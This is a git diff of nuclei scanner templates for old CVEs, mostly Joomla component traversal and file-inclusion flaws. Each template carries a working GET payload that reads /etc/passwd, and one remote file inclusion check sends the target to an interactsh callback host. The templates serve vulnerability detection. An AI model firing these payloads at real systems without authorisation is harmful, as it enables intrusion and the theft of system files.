"CVE-2019-14470-3851.yaml": "2024-11-22 02:35:15", + "CVE-2024-10316.yaml": "2024-11-22 02:35:15", + "CVE-2024-11385.yaml": "2024-11-22 02:35:15", + "CVE-2024-11428.yaml": "2024-11-22 02:35:15", + "wip-incoming-lite.yaml": "2024-11-22 02:35:15", + "CVE-2012-4273-2197.yaml": "2024-11-22 02:35:15", + "CVE-2024-11089.yaml": "2024-11-22 02:35:15", + "cve-2011-5107-2102.yaml": "2024-11-22 02:35:15", + "tour-operator.yaml": "2024-11-22 02:35:15", + "CVE-2021-21389-5509.yaml": "2024-11-22 02:35:15", + "CVE-2022-0148-6604.yaml": "2024-11-22 02:35:15", + "cve-2013-2287-2247.yaml": "2024-11-22 02:35:15", + "CVE-2016-1000128-2651.yaml": "2024-11-22 02:35:15", + "cve-2021-24947-5774.yaml": "2024-11-22 02:35:15", + "CVE-2024-11424.yaml": "2024-11-22 02:35:15", + "cve-2019-16525-3937.yaml": "2024-11-22 02:35:15", + "cve-2016-1000136-2689.yaml": "2024-11-22 02:35:15", + "CVE-2024-10393.yaml": "2024-11-22 02:35:15", + "cve-2015-5461-2555.yaml": "2024-11-22 02:35:15", + "CVE-2013-3526-2252.yaml": "2024-11-22 02:35:15", + "CVE-2024-11455.yaml": "2024-11-22 02:35:15", + "cve-2021-24472-5744.yaml": "2024-11-22 02:35:15", + "cve-2019-16932(1).yaml": "2024-11-22 02:35:15", + "void-visual-whmcs-element.yaml": "2024-11-22 02:35:15", + "slick-sitemap.yaml": "2024-11-22 02:35:15", + "cve-2021-24335-5701.yaml": "2024-11-22 02:35:15", + "cve-2016-1000143-2717.yaml": "2024-11-22 02:35:15", + "CVE-2014-9444-2423.yaml": "2024-11-22 02:35:15", + "cve-2014-4550-2364.yaml": "2024-11-22 02:35:15", + "CVE-2024-11414.yaml": "2024-11-22 02:35:15", + "cve-2014-4536-2350.yaml": "2024-11-22 02:35:15", + "cve-2014-4940-2381.yaml": "2024-11-22 02:35:15", + "CVE-2024-10785.yaml": "2024-11-22 02:35:15", + "CVE-2014-5368-2397.yaml": "2024-11-22 02:35:15", + "CVE-2015-4414-2527.yaml": "2024-11-22 02:35:15", + "CVE-2022-0952(1).yaml": "2024-11-22 02:35:15", + "CVE-2021-24176-5634.yaml": "2024-11-22 02:35:15", + "bard-extra.yaml": "2024-11-22 02:35:15", + "cve-2021-24991-5778.yaml": "2024-11-22 02:35:15", + "CVE-2012-0901-2138.yaml": "2024-11-22 02:35:15", + "cve-2020-12054-4458.yaml": "2024-11-22 02:35:15", + "dino-game.yaml": "2024-11-22 02:35:15", + "CVE-2021-24146-5630.yaml": "2024-11-22 02:35:15", + "cve-2019-15889-3904.yaml": "2024-11-22 02:35:15", + "cve-2016-10033-2749.yaml": "2024-11-22 02:35:15", + "lazy-load-videos-and-sticky-control.yaml": "2024-11-22 02:35:15", + "CVE-2024-10400.yaml": "2024-11-22 02:35:15", + "CVE-2022-0288(1).yaml": "2024-11-22 02:35:15", + "cve-2021-24406-5732.yaml": "2024-11-22 02:35:15", + "CVE-2024-10671.yaml": "2024-11-22 02:35:15", + "CVE-2011-5181-2116.yaml": "2024-11-22 02:35:15", + "cve-2016-1000131-2664.yaml": "2024-11-22 02:35:15", + "CVE-2024-11371.yaml": "2024-11-22 02:35:15", + "cve-2021-24340-5709.yaml": "2024-11-22 02:35:15", + "CVE-2024-10177.yaml": "2024-11-22 02:35:15", + "cve-2014-4561-2372.yaml": "2024-11-22 02:35:15", + "CVE-2013-4625-2270.yaml": "2024-11-22 02:35:15", + "CVE-2022-0653-6639.yaml": "2024-11-22 02:35:15", + "cve-2015-2807-2497.yaml": "2024-11-22 02:35:15", + "CVE-2024-10696.yaml": "2024-11-22 02:35:15", + "cve-2020-35749-5073.yaml": "2024-11-22 02:35:15", + "CVE-2024-11360.yaml": "2024-11-22 02:35:15", + "cve-2020-12800-4486.yaml": "2024-11-22 02:35:15", + "cve-2022-0201(1).yaml": "2024-11-22 02:35:15", + "CVE-2024-11088.yaml": "2024-11-22 02:35:15", + "CVE-2018-3810-3555.yaml": "2024-11-22 02:35:15", + "cve-2021-39312-6327.yaml": "2024-11-22 02:35:15", + "CVE-2017-18598-2997.yaml": "2024-11-22 02:35:15", + "cve-2020-13700-4513.yaml": "2024-11-22 02:35:15", + "CVE-2021-24298-5686.yaml": "2024-11-22 02:35:15", + "CVE-2021-24316-5692.yaml": "2024-11-22 02:35:15", + "cve-2021-24389-5727.yaml": "2024-11-22 02:35:15", + "security-force.yaml": "2024-11-22 02:35:15", + "cve-2016-1000129-2654.yaml": "2024-11-22 02:35:15", + "CVE-2014-4558-2369.yaml": "2024-11-22 02:35:15", + "CVE-2021-24284(1).yaml": "2024-11-22 02:35:15", + "CVE-2016-1000130-2659.yaml": "2024-11-22 02:35:15", + "CVE-2016-1000154-2740.yaml": "2024-11-22 02:35:15", + "CVE-2024-9371.yaml": "2024-11-22 02:35:15", + "CVE-2021-24274-5658.yaml": "2024-11-22 02:35:15", + "CVE-2024-10898.yaml": "2024-11-22 02:35:15", + "CVE-2016-1000127-2644.yaml": "2024-11-22 02:35:15", + "CVE-2021-39320-6336.yaml": "2024-11-22 02:35:15" } \ No newline at end of file diff --git a/nuclei-templates/CVE-2000/cve-2000-0114.yaml b/nuclei-templates/CVE-2000/CVE-2000-0114.yaml similarity index 100% rename from nuclei-templates/CVE-2000/cve-2000-0114.yaml rename to nuclei-templates/CVE-2000/CVE-2000-0114.yaml diff --git a/nuclei-templates/CVE-2002/cve-2002-1131.yaml b/nuclei-templates/CVE-2002/CVE-2002-1131.yaml similarity index 100% rename from nuclei-templates/CVE-2002/cve-2002-1131.yaml rename to nuclei-templates/CVE-2002/CVE-2002-1131.yaml diff --git a/nuclei-templates/CVE-2006/CVE-2006-2842.yaml b/nuclei-templates/CVE-2006/CVE-2006-2842.yaml deleted file mode 100644 index 2c5e750191..0000000000 --- a/nuclei-templates/CVE-2006/CVE-2006-2842.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2006-2842 - -info: - name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion - author: dhiyaneshDk - severity: high - description: 'PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable.' - reference: - - https://www.exploit-db.com/exploits/27948 - - http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE - - http://www.squirrelmail.org/security/issue/2006-06-01 - - http://secunia.com/advisories/20406 - classification: - cve-id: CVE-2006-2842 - tags: cve2006,lfi,squirrelmail,cve - -requests: - - method: GET - path: - - "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2006/cve-2006-2842.yaml b/nuclei-templates/CVE-2006/cve-2006-2842.yaml new file mode 100644 index 0000000000..243a171e68 --- /dev/null +++ b/nuclei-templates/CVE-2006/cve-2006-2842.yaml @@ -0,0 +1,25 @@ +id: CVE-2006-2842 + +info: + name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion + author: dhiyaneshDk + severity: high + description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable." + reference: https://www.exploit-db.com/exploits/27948 + tags: cve2006,lfi,squirrelmail,cve + +requests: + - method: GET + path: + - "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2007/cve-2007-0885.yaml b/nuclei-templates/CVE-2007/CVE-2007-0885.yaml similarity index 100% rename from nuclei-templates/CVE-2007/cve-2007-0885.yaml rename to nuclei-templates/CVE-2007/CVE-2007-0885.yaml diff --git a/nuclei-templates/CVE-2007/CVE-2007-4504.yaml b/nuclei-templates/CVE-2007/CVE-2007-4504.yaml deleted file mode 100644 index 9463b90ee5..0000000000 --- a/nuclei-templates/CVE-2007/CVE-2007-4504.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2007-4504 - -info: - name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval - author: daffainfo - severity: high - description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. - reference: - - https://www.exploit-db.com/exploits/4307 - - https://www.cvedetails.com/cve/CVE-2007-4504 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222 - classification: - cve-id: CVE-2007-4504 - tags: cve,cve2007,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2007/cve-2007-4504.yaml b/nuclei-templates/CVE-2007/cve-2007-4504.yaml new file mode 100644 index 0000000000..f9e0afd43d --- /dev/null +++ b/nuclei-templates/CVE-2007/cve-2007-4504.yaml @@ -0,0 +1,27 @@ +id: CVE-2007-4504 + +info: + name: Joomla! Component RSfiles 1.0.2 - 'path' File Download + author: daffainfo + severity: high + description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action. + reference: + - https://www.exploit-db.com/exploits/4307 + - https://www.cvedetails.com/cve/CVE-2007-4504 + tags: cve,cve2007,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2008/cve-2008-2398.yaml b/nuclei-templates/CVE-2008/CVE-2008-2398.yaml similarity index 100% rename from nuclei-templates/CVE-2008/cve-2008-2398.yaml rename to nuclei-templates/CVE-2008/CVE-2008-2398.yaml diff --git a/nuclei-templates/CVE-2008/CVE-2008-4668.yaml b/nuclei-templates/CVE-2008/CVE-2008-4668.yaml new file mode 100644 index 0000000000..d14e0a3b1e --- /dev/null +++ b/nuclei-templates/CVE-2008/CVE-2008-4668.yaml @@ -0,0 +1,31 @@ +id: CVE-2008-4668 + +info: + name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/6618 + - https://www.cvedetails.com/cve/CVE-2008-4668 + - http://www.securityfocus.com/bid/31458 + - http://securityreason.com/securityalert/4464 + classification: + cve-id: CVE-2008-4668 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2008/CVE-2008-4764.yaml b/nuclei-templates/CVE-2008/CVE-2008-4764.yaml new file mode 100644 index 0000000000..0b0db9bff6 --- /dev/null +++ b/nuclei-templates/CVE-2008/CVE-2008-4764.yaml @@ -0,0 +1,31 @@ +id: CVE-2008-4764 + +info: + name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. + reference: + - https://www.exploit-db.com/exploits/5435 + - https://www.cvedetails.com/cve/CVE-2008-4764 + - http://www.securityfocus.com/bid/28764 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/41873 + classification: + cve-id: CVE-2008-4764 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2008/CVE-2008-5587.yaml b/nuclei-templates/CVE-2008/CVE-2008-5587.yaml deleted file mode 100644 index fda684a006..0000000000 --- a/nuclei-templates/CVE-2008/CVE-2008-5587.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2008-5587 -info: - name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion - author: dhiyaneshDK - severity: medium - description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/7363 - - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ - - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 - - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 - classification: - cve-id: CVE-2008-5587 - metadata: - shodan-query: http.title:"phpPgAdmin" - tags: cve,cve2008,lfi,phppgadmin -requests: - - method: GET - path: - - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2008/CVE-2008-6222.yaml b/nuclei-templates/CVE-2008/CVE-2008-6222.yaml new file mode 100644 index 0000000000..c52d791b69 --- /dev/null +++ b/nuclei-templates/CVE-2008/CVE-2008-6222.yaml @@ -0,0 +1,31 @@ +id: CVE-2008-6222 + +info: + name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/6980 + - https://www.cvedetails.com/cve/CVE-2008-6222 + - http://secunia.com/advisories/32523 + - http://www.securityfocus.com/bid/32113 + classification: + cve-id: CVE-2008-6222 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2008/cve-2008-4668.yaml b/nuclei-templates/CVE-2008/cve-2008-4668.yaml deleted file mode 100644 index ab38886489..0000000000 --- a/nuclei-templates/CVE-2008/cve-2008-4668.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2008-4668 - -info: - name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/6618 - - https://www.cvedetails.com/cve/CVE-2008-4668 - tags: cve,cve2008,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2008/cve-2008-4764.yaml b/nuclei-templates/CVE-2008/cve-2008-4764.yaml deleted file mode 100644 index 309174ce27..0000000000 --- a/nuclei-templates/CVE-2008/cve-2008-4764.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2008-4764 - -info: - name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. - reference: - - https://www.exploit-db.com/exploits/5435 - - https://www.cvedetails.com/cve/CVE-2008-4764 - tags: cve,cve2008,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2008/cve-2008-5587.yaml b/nuclei-templates/CVE-2008/cve-2008-5587.yaml new file mode 100644 index 0000000000..6045940b95 --- /dev/null +++ b/nuclei-templates/CVE-2008/cve-2008-5587.yaml @@ -0,0 +1,27 @@ +id: CVE-2008-5587 + +info: + name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion + author: dhiyaneshDK + severity: medium + reference: https://www.exploit-db.com/exploits/7363 + tags: cve2008,lfi,phppgadmin + metadata: + shodan-query: 'http.title:"phpPgAdmin"' + description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." + +requests: + - method: GET + path: + - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2008/cve-2008-6222.yaml b/nuclei-templates/CVE-2008/cve-2008-6222.yaml deleted file mode 100644 index 6cb7474f10..0000000000 --- a/nuclei-templates/CVE-2008/cve-2008-6222.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2008-6222 - -info: - name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/6980 - - https://www.cvedetails.com/cve/CVE-2008-6222 - tags: cve,cve2008,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-1496.yaml b/nuclei-templates/CVE-2009/CVE-2009-1496.yaml new file mode 100644 index 0000000000..96796ca27b --- /dev/null +++ b/nuclei-templates/CVE-2009/CVE-2009-1496.yaml @@ -0,0 +1,30 @@ +id: CVE-2009-1496 + +info: + name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/8367 + - https://www.cvedetails.com/cve/CVE-2009-1496 + - http://www.securityfocus.com/bid/34431 + classification: + cve-id: CVE-2009-1496 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-2015.yaml b/nuclei-templates/CVE-2009/CVE-2009-2015.yaml deleted file mode 100644 index 3900e491b5..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-2015.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2009-2015 - -info: - name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. - reference: - - https://www.exploit-db.com/exploits/8898 - - https://www.cvedetails.com/cve/CVE-2009-2015 - - http://www.securityfocus.com/bid/35259 - - http://www.vupen.com/english/advisories/2009/1530 - classification: - cve-id: CVE-2009-2015 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-2100.yaml b/nuclei-templates/CVE-2009/CVE-2009-2100.yaml deleted file mode 100644 index 0b560673c6..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-2100.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2009-2100 - -info: - name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8946 - - https://www.cvedetails.com/cve/CVE-2009-2100 - - http://www.securityfocus.com/bid/35378 - - http://osvdb.org/55176 - classification: - cve-id: CVE-2009-2100 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-3053.yaml b/nuclei-templates/CVE-2009/CVE-2009-3053.yaml new file mode 100644 index 0000000000..7377bc684f --- /dev/null +++ b/nuclei-templates/CVE-2009/CVE-2009-3053.yaml @@ -0,0 +1,31 @@ +id: CVE-2009-3053 + +info: + name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php. + reference: + - https://www.exploit-db.com/exploits/9564 + - https://www.cvedetails.com/cve/CVE-2009-3053 + - http://www.securityfocus.com/bid/36207 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964 + classification: + cve-id: CVE-2009-3053 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-3318.yaml b/nuclei-templates/CVE-2009/CVE-2009-3318.yaml new file mode 100644 index 0000000000..2e1f8c8283 --- /dev/null +++ b/nuclei-templates/CVE-2009/CVE-2009-3318.yaml @@ -0,0 +1,30 @@ +id: CVE-2009-3318 + +info: + name: Joomla! Component com_album 1.14 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/9706 + - https://www.cvedetails.com/cve/CVE-2009-3318 + - http://www.securityfocus.com/bid/36441 + classification: + cve-id: CVE-2009-3318 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-4202.yaml b/nuclei-templates/CVE-2009/CVE-2009-4202.yaml new file mode 100644 index 0000000000..95e235cf67 --- /dev/null +++ b/nuclei-templates/CVE-2009/CVE-2009-4202.yaml @@ -0,0 +1,31 @@ +id: CVE-2009-4202 + +info: + name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/8870 + - https://www.cvedetails.com/cve/CVE-2009-4202 + - http://www.vupen.com/english/advisories/2009/1494 + - http://www.securityfocus.com/bid/35201 + classification: + cve-id: CVE-2009-4202 + tags: cve,cve2009,joomla,lfi,photo + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-4223.yaml b/nuclei-templates/CVE-2009/CVE-2009-4223.yaml new file mode 100644 index 0000000000..0d94841eb8 --- /dev/null +++ b/nuclei-templates/CVE-2009/CVE-2009-4223.yaml @@ -0,0 +1,28 @@ +id: CVE-2009-4223 + +info: + name: KR-Web <= 1.1b2 RFI + description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents. + reference: + - https://sourceforge.net/projects/krw/ + - https://www.exploit-db.com/exploits/10216 + author: geeknik + severity: high + classification: + cve-id: CVE-2009-4223 + tags: cve,cve2009,krweb,rfi + +requests: + - method: GET + path: + - "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/nuclei-templates/CVE-2009/CVE-2009-4679.yaml b/nuclei-templates/CVE-2009/CVE-2009-4679.yaml new file mode 100644 index 0000000000..5f63aae9d3 --- /dev/null +++ b/nuclei-templates/CVE-2009/CVE-2009-4679.yaml @@ -0,0 +1,31 @@ +id: CVE-2009-4679 + +info: + name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/33440 + - https://www.cvedetails.com/cve/CVE-2009-4679 + - http://secunia.com/advisories/37760 + - http://www.osvdb.org/61382 + classification: + cve-id: CVE-2009-4679 + tags: cve,cve2009,joomla,lfi,nexus + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-1496.yaml b/nuclei-templates/CVE-2009/cve-2009-1496.yaml deleted file mode 100644 index b915fc3ad0..0000000000 --- a/nuclei-templates/CVE-2009/cve-2009-1496.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2009-1496 - -info: - name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8367 - - https://www.cvedetails.com/cve/CVE-2009-1496 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-2015.yaml b/nuclei-templates/CVE-2009/cve-2009-2015.yaml new file mode 100644 index 0000000000..372820389d --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-2015.yaml @@ -0,0 +1,27 @@ +id: CVE-2009-2015 + +info: + name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/8898 + - https://www.cvedetails.com/cve/CVE-2009-2015 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-2100.yaml b/nuclei-templates/CVE-2009/cve-2009-2100.yaml new file mode 100644 index 